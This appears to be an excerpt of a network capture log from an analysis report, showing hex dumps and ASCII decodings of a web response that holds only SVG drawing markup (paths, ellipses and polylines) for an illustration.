                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6761INData Raw: 30 2c 30 2c 30 2c 2e 37 36 2e 36 2c 36 2e 35 38 2c 36 2e 35 38 2c 30 2c 30 2c 30 2c 32 2e 33 35 2c 31 2e 30 37 2c 37 2e 32 38 2c 37 2e 32 38 2c 30 2c 30 2c 30 2c 32 2e 33 37 2d 2e 30 39 6c 31 2e 38 37 2d 2e 32 37 61 35 2e 32 34 2c 35 2e 32 34 2c 30 2c 30 2c 30 2c 32 2e 35 38 2d 2e 38 35 41 32 2e 39 31 2c 32 2e 39 31 2c 30 2c 30 2c 30 2c 39 30 35 2e 35 37 2c 32 35 33 2e 35 32 5a 22 2f 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 31 33 34 22 20 64 3d 22 4d 38 39 36 2e 39 32 2c 32 34 36 2e 37 33 61 32 2e 33 36 2c 32 2e 33 36 2c 30 2c 30 2c 31 2c 2e 37 34 2d 2e 35 35 63 30 2d 2e 34 32 2e 32 37 2d 2e 37 39 2e 32 32 2d 31 2e 32 32 61 36 2e 34 38 2c 36 2e 34 38 2c 30 2c 30 2c 31 2c 32 2e 33 32 2d 2e 30 35 63 2d 2e 35 38 2e 39 34 2e 33 34 2c 32 2e 31 2c
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,0,.76.6,6.58,6.58,0,0,0,2.35,1.07,7.28,7.28,0,0,0,2.37-.09l1.87-.27a5.24,5.24,0,0,0,2.58-.85A2.91,2.91,0,0,0,905.57,253.52Z"/><path class="cls-134" d="M896.92,246.73a2.36,2.36,0,0,1,.74-.55c0-.42.27-.79.22-1.22a6.48,6.48,0,0,1,2.32-.05c-.58.94.34,2.1,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6777INData Raw: 36 37 2c 34 2e 37 36 2e 36 36 2c 37 2e 32 61 31 30 2e 36 34 2c 31 30 2e 36 34 2c 30 2c 30 2c 31 2d 32 2d 2e 31 38 2c 39 2c 39 2c 30 2c 30 2c 31 2d 31 2e 31 33 2d 2e 33 31 63 2d 2e 32 32 2d 2e 30 35 2d 31 2e 32 36 2d 2e 34 35 2d 31 2e 34 35 2d 2e 33 73 2e 31 38 2e 37 2e 33 32 2e 38 39 63 2e 32 36 2e 33 37 2e 33 34 2e 34 36 2e 32 33 2e 39 61 2e 38 33 2e 38 33 2c 30 2c 30 2c 31 2d 2e 35 31 2e 36 38 63 2d 2e 31 33 2e 30 36 2d 2e 38 36 2e 32 32 2d 31 2c 2e 31 33 2c 31 2e 32 34 2c 31 2e 31 39 2c 33 2e 32 36 2c 31 2c 34 2e 38 36 2c 31 2e 32 6c 32 2e 34 33 2e 32 34 63 2e 36 2e 30 36 2c 31 2e 31 37 2e 31 33 2c 31 2e 34 35 2d 2e 35 34 61 33 2e 38 37 2c 33 2e 38 37 2c 30 2c 30 2c 30 2c 2e 31 32 2d 31 2e 33 31 63 30 2d 31 2d 2e 31 36 2d 32 2d 2e 32 2d 33 43 38 32 37
                                                                                                                                                                                                                                                                                        Data Ascii: 67,4.76.66,7.2a10.64,10.64,0,0,1-2-.18,9,9,0,0,1-1.13-.31c-.22-.05-1.26-.45-1.45-.3s.18.7.32.89c.26.37.34.46.23.9a.83.83,0,0,1-.51.68c-.13.06-.86.22-1,.13,1.24,1.19,3.26,1,4.86,1.2l2.43.24c.6.06,1.17.13,1.45-.54a3.87,3.87,0,0,0,.12-1.31c0-1-.16-2-.2-3C827
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6793INData Raw: 2d 33 2d 31 33 2e 35 2d 33 6c 2d 33 30 2e 36 39 2d 33 2e 35 37 63 2d 31 2e 32 34 2d 2e 30 38 2d 34 2d 34 2d 34 2e 38 33 2d 34 2e 39 61 34 33 2e 30 37 2c 34 33 2e 30 37 2c 30 2c 30 2c 30 2d 34 2e 31 37 2d 33 2e 39 35 63 2d 32 2e 30 36 2d 31 2e 37 36 2d 33 2e 39 34 2d 33 2e 38 2d 35 2e 38 39 2d 35 2e 36 38 6c 2d 31 30 2d 39 2e 36 34 63 2d 36 2e 33 36 2d 31 2e 35 36 2d 31 32 2e 37 36 2d 33 2d 31 39 2e 31 32 2d 34 2e 35 36 2d 34 2e 33 35 2d 31 2e 30 38 2d 38 2e 37 34 2d 36 2e 31 33 2d 31 32 2e 38 36 2d 37 2e 38 31 2d 31 2e 32 33 2d 35 2e 31 34 2d 31 2e 35 38 2d 39 2d 33 2e 39 35 2d 31 37 2e 34 38 2d 2e 30 36 2d 2e 32 32 2c 31 2e 32 32 2d 39 2c 31 2e 36 38 2d 39 2c 31 32 2e 30 39 2e 31 34 2c 32 31 2c 2e 35 36 2c 33 33 2c 2e 36 35 2c 32 33 2c 2e 31 38 2c 34 35
                                                                                                                                                                                                                                                                                        Data Ascii: -3-13.5-3l-30.69-3.57c-1.24-.08-4-4-4.83-4.9a43.07,43.07,0,0,0-4.17-3.95c-2.06-1.76-3.94-3.8-5.89-5.68l-10-9.64c-6.36-1.56-12.76-3-19.12-4.56-4.35-1.08-8.74-6.13-12.86-7.81-1.23-5.14-1.58-9-3.95-17.48-.06-.22,1.22-9,1.68-9,12.09.14,21,.56,33,.65,23,.18,45
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6809INData Raw: 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 37 20 35 36 33 2e 36 34 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 34 30 2e 36 39 22 20 63 79 3d 22 32 31 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 35 22 20 72 79 3d 22 30 2e 31 39 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 34 36 2e 38 36 20 35 36 33 2e 39 39 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 33 39 2e 30 38 22 20 63 79 3d 22 32 31 34 2e 30 35 22 20 72 78 3d 22 30 2e 31 35 22 20
                                                                                                                                                                                                                                                                                        Data Ascii: ry="0.19" transform="translate(47 563.64) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="840.69" cy="214.09" rx="0.15" ry="0.19" transform="translate(46.86 563.99) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="839.08" cy="214.05" rx="0.15"
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6825INData Raw: 63 79 3d 22 32 33 33 2e 36 37 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 37 38 20 35 35 30 2e 37 36 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 32 2e 39 38 22 20 63 79 3d 22 32 33 34 2e 30 39 22 20 72 78 3d 22 30 2e 31 37 22 20 72 79 3d 22 30 2e 32 32 22 20 74 72 61 6e 73 66 6f 72 6d 3d 22 74 72 61 6e 73 6c 61 74 65 28 32 38 2e 36 33 20 35 35 31 2e 31 35 29 20 72 6f 74 61 74 65 28 2d 33 38 2e 30 37 29 22 3e 3c 2f 65 6c 6c 69 70 73 65 3e 3c 65 6c 6c 69 70 73 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 22 20 63 78 3d 22 38 31 33 2e 34
                                                                                                                                                                                                                                                                                        Data Ascii: cy="233.67" rx="0.17" ry="0.22" transform="translate(28.78 550.76) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="812.98" cy="234.09" rx="0.17" ry="0.22" transform="translate(28.63 551.15) rotate(-38.07)"></ellipse><ellipse class="cls-38" cx="813.4
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6841INData Raw: 73 20 31 20 6e 6f 72 6d 61 6c 20 6e 6f 6e 65 20 72 75 6e 6e 69 6e 67 3b 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 33 38 20 73 76 67 2d 61 6e 69 6d 22 20 64 3d 22 4d 38 30 38 2e 38 35 2c 32 38 31 2e 37 37 61 31 2e 38 35 2c 31 2e 38 35 2c 30 2c 30 2c 31 2c 2e 31 31 2d 2e 33 31 63 2d 2e 33 31 2e 36 37 2d 31 2c 31 2d 31 2e 30 39 2c 31 2e 37 38 61 31 31 2c 31 31 2c 30 2c 30 2c 30 2d 2e 31 35 2c 31 2e 31 35 63 30 2c 2e 34 34 2e 32 2e 36 32 2e 33 31 2c 31 2c 2e 32 32 2e 37 34 2d 2e 31 37 2c 31 2e 37 35 2d 31 2e 30 37 2c 31 2e 34 35 2d 2e 36 39 2d 2e 32 33 2d 31 2e 31 2d 31 2d 31 2e 36 2d 31 2e 34 35 61 31 31 2e 37 36 2c 31 31 2e 37 36 2c 30 2c 30 2c 31 2d 31 2e 38 39 2d 31 2e 37 37 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c
                                                                                                                                                                                                                                                                                        Data Ascii: s 1 normal none running;"></path><path class="cls-38 svg-anim" d="M808.85,281.77a1.85,1.85,0,0,1,.11-.31c-.31.67-1,1-1.09,1.78a11,11,0,0,0-.15,1.15c0,.44.2.62.31,1,.22.74-.17,1.75-1.07,1.45-.69-.23-1.1-1-1.6-1.45a11.76,11.76,0,0,1-1.89-1.77,2.39,2.39,0,0,
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6857INData Raw: 35 2e 36 36 20 35 39 38 2e 34 35 20 32 32 31 2e 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 39 2e 35 34 20 32 31 31 2e 31 32 20 35 39 32 2e 36 35 20 32 31 36 2e 32 33 20 35 39 39 2e 32 20 32 32 30 2e 32 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 32 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 33 35 2e 32 32 20 35 39 30 2e 35 20 32 33 39 2e 35 34 20 35 39 37 2e 38 31 20 32 33 36 2e 33 37 22 3e 3c 2f 70 6f 6c 79 6c 69 6e 65 3e 3c 70 6f 6c 79 6c 69 6e 65 20 63 6c 61 73 73 3d 22 63 6c 73 2d 35 33 22 20 70 6f 69 6e 74 73 3d 22 35 37 37 2e 38 32 20 32 35 30 2e 33 31 20 35 39 30 2e 35 20 32
                                                                                                                                                                                                                                                                                        Data Ascii: 5.66 598.45 221.7"></polyline><polyline class="cls-52" points="579.54 211.12 592.65 216.23 599.2 220.2"></polyline><polyline class="cls-52" points="577.82 235.22 590.5 239.54 597.81 236.37"></polyline><polyline class="cls-53" points="577.82 250.31 590.5 2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6873INData Raw: 61 6e 69 6d 22 20 64 3d 22 4d 36 30 39 2e 33 33 2c 33 30 34 2e 38 39 61 31 2e 36 32 2c 31 2e 36 32 2c 30 2c 30 2c 30 2c 2e 32 2d 2e 32 38 63 2d 2e 34 2e 36 37 2d 2e 33 31 2c 31 2e 34 38 2d 2e 39 2c 32 61 39 2e 39 34 2c 39 2e 39 34 2c 30 2c 30 2c 31 2d 2e 39 32 2e 38 63 2d 2e 33 38 2e 32 37 2d 2e 36 35 2e 32 2d 31 2c 2e 33 33 2d 2e 37 38 2e 32 35 2d 31 2e 34 33 2c 31 2e 31 37 2d 2e 36 34 2c 31 2e 37 38 61 35 2e 31 38 2c 35 2e 31 38 2c 30 2c 30 2c 30 2c 32 2e 32 31 2e 35 34 2c 31 32 2e 31 31 2c 31 32 2e 31 31 2c 30 2c 30 2c 30 2c 32 2e 36 35 2e 36 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 30 2c 31 2e 34 35 2d 2e 35 35 63 2e 34 35 2d 2e 34 38 2e 32 38 2d 31 2e 35 37 2e 32 34 2d 32 2e 31 36 2d 2e 30 36 2d 31 2d 2e 34 33 2d 31 2e 39 32 2d 2e 34 31 2d 32 2e
                                                                                                                                                                                                                                                                                        Data Ascii: anim" d="M609.33,304.89a1.62,1.62,0,0,0,.2-.28c-.4.67-.31,1.48-.9,2a9.94,9.94,0,0,1-.92.8c-.38.27-.65.2-1,.33-.78.25-1.43,1.17-.64,1.78a5.18,5.18,0,0,0,2.21.54,12.11,12.11,0,0,0,2.65.6,2.52,2.52,0,0,0,1.45-.55c.45-.48.28-1.57.24-2.16-.06-1-.43-1.92-.41-2.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6889INData Raw: 30 2c 30 2d 2e 35 32 2d 2e 30 36 2c 31 2e 35 34 2c 31 2e 35 34 2c 30 2c 30 2c 30 2d 2e 37 2e 31 35 2c 31 2e 34 33 2c 31 2e 34 33 2c 30 2c 30 2c 30 2d 2e 35 2e 34 31 2c 31 2e 37 37 2c 31 2e 37 37 2c 30 2c 30 2c 30 2d 2e 33 2e 35 38 2c 32 2e 36 31 2c 32 2e 36 31 2c 30 2c 30 2c 30 2d 2e 30 39 2e 36 39 76 33 68 2d 31 2e 31 33 56 37 31 2e 31 36 43 38 39 34 2e 34 39 2c 37 31 2c 38 39 34 2e 34 39 2c 37 30 2e 38 31 2c 38 39 34 2e 34 38 2c 37 30 2e 35 37 5a 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 32 22 20 64 3d 22 4d 39 30 30 2e 31 35 2c 36 37 2e 38 38 61 2e 36 37 2e 36 37 2c 30 2c 30 2c 31 2d 2e 32 32 2e 35 32 2e 37 32 2e 37 32 2c 30 2c 30 2c 31 2d 2e 35 33 2e 32 2e 36 38 2e 36 38 2c 30 2c 30 2c 31 2d 2e 35 32 2d 2e 32 31 2e
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0-.52-.06,1.54,1.54,0,0,0-.7.15,1.43,1.43,0,0,0-.5.41,1.77,1.77,0,0,0-.3.58,2.61,2.61,0,0,0-.09.69v3h-1.13V71.16C894.49,71,894.49,70.81,894.48,70.57Z"></path><path class="cls-2" d="M900.15,67.88a.67.67,0,0,1-.22.52.72.72,0,0,1-.53.2.68.68,0,0,1-.52-.21.
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6905INData Raw: 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 30 30 2e 31 31 2c 32 30 31 2e 37 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 41 32 2e 35 33 2c 32 2e 35 33 2c 30 2c 30 2c 31 2c 36 39 36 2c 32 30 33 61 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d
                                                                                                                                                                                                                                                                                        Data Ascii: 51-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M700.11,201.72a1.73,1.73,0,0,1-.78,2.24A2.53,2.53,0,0,1,696,203a2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.12,2.12,0,0,1,.16,2.85"></path><path class="cls-4" d="M
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6921INData Raw: 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 35 37 2c 32 39 37 2e 38 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 33 39 2c 32 2e 33 39 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 33 31 2e 33 34 2c 32 39 30 2e 39 31 61 31 2e 37
                                                                                                                                                                                                                                                                                        Data Ascii: 0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path><path class="cls-4" d="M731.57,297.84a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.39,2.39,0,0,1,.52-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M731.34,290.91a1.7
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6937INData Raw: 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 34 32 2c 32 30 30 2e 30 36 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 34 39 2e 31 39 2c 31 39 33 2e 31 32 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d
                                                                                                                                                                                                                                                                                        Data Ascii: th><path class="cls-4" d="M749.42,200.06a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M749.19,193.12a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6953INData Raw: 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 2c 32 2e 35 2c 30 2c 30 2c 31 2d 33 2e 33 33 2d 2e 39 34 2c 32 2e 33 37 2c 32 2e 33 37 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 34 2c 32 2e 32 34 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 38 30 2e 36 35 2c 32 38 39 2e 32 34 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 37 2c 32 2e 32 37 2c 30 2c 30 2c 31 2c 32
                                                                                                                                                                                                                                                                                        Data Ascii: ,1.72,0,0,1-.78,2.23,2.5,2.5,0,0,1-3.33-.94,2.37,2.37,0,0,1,.51-2.88,2.24,2.24,0,0,1,2.89,0,2.12,2.12,0,0,1,.16,2.86"></path><path class="cls-4" d="M780.65,289.24a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.27,2.27,0,0,1,2
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6969INData Raw: 2e 33 34 2d 2e 39 34 2c 32 2e 34 31 2c 32 2e 34 31 2c 30 2c 30 2c 31 2c 2e 35 32 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 37 39 38 2e 35 2c 31 39 31 2e 34 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 32 2c 32 2e 31 32 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68
                                                                                                                                                                                                                                                                                        Data Ascii: .34-.94,2.41,2.41,0,0,1,.52-2.89,2.25,2.25,0,0,1,2.89,0,2.11,2.11,0,0,1,.16,2.85"></path><path class="cls-4" d="M798.5,191.45a1.73,1.73,0,0,1-.78,2.24,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.12,2.12,0,0,1,.15,2.86"></path
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC6985INData Raw: 30 2c 31 2c 32 2e 38 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 33 30 2c 32 38 37 2e 35 37 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 32 2c 32 2e 35 32 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 36 2c 32 2e 32 36 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 32 39 2e 37 32 2c 32 38 30 2e 36 33 61 31 2e 37 32 2c 31 2e 37
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1,2.89,0,2.11,2.11,0,0,1,.16,2.86"></path><path class="cls-4" d="M830,287.57a1.72,1.72,0,0,1-.78,2.23,2.52,2.52,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.26,2.26,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M829.72,280.63a1.72,1.7
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:10 UTC7001INData Raw: 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 38 31 2c 31 38 39 2e 37 39 41 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2c 38 34 37 2c 31 39 32 61 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 39 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 31 2c 32 2e 31 31 2c 30 2c 30 2c 31 2c 2e 31 35 2c 32 2e 38 35 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 34 37 2e 35 37 2c 31 38 32 2e 38 35 61 31 2e 37 33 2c 31 2e 37 33 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 34 2c 32 2e 35 31
                                                                                                                                                                                                                                                                                        Data Ascii: 0,1,.16,2.86"></path><path class="cls-4" d="M847.81,189.79A1.72,1.72,0,0,1,847,192a2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.51-2.89,2.25,2.25,0,0,1,2.9,0,2.11,2.11,0,0,1,.15,2.85"></path><path class="cls-4" d="M847.57,182.85a1.73,1.73,0,0,1-.78,2.24,2.51
                                                                                                                                                                                                                                                                                        2023-05-31 12:52:11 UTC7017INData Raw: 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2e 32 37 2c 32 38 35 2e 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 2c 32 2e 34 2c 30 2c 30 2c 31 2c 2e 35 31 2d 32 2e 38 38 2c 32 2e 32 35 2c 32 2e 32 35 2c 30 2c 30 2c 31 2c 32 2e 39 2c 30 2c 32 2e 31 33 2c 32 2e 31 33 2c 30 2c 30 2c 31 2c 2e 31 36 2c 32 2e 38 36 22 3e 3c 2f 70 61 74 68 3e 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 63 6c 73 2d 34 22 20 64 3d 22 4d 38 37 39 2c 32 37 39 61 31 2e 37 32 2c 31 2e 37 32 2c 30 2c 30 2c 31 2d 2e 37 38 2c 32 2e 32 33 2c 32 2e 35 31 2c 32 2e 35 31 2c 30 2c 30 2c 31 2d 33 2e 33 34 2d 2e 39 34 2c 32 2e 34 32 2c 32 2e 34 32 2c 30 2c 30 2c 31 2c 2e 35
                                                                                                                                                                                                                                                                                        Data Ascii: s="cls-4" d="M879.27,285.9a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.4,2.4,0,0,1,.51-2.88,2.25,2.25,0,0,1,2.9,0,2.13,2.13,0,0,1,.16,2.86"></path><path class="cls-4" d="M879,279a1.72,1.72,0,0,1-.78,2.23,2.51,2.51,0,0,1-3.34-.94,2.42,2.42,0,0,1,.5
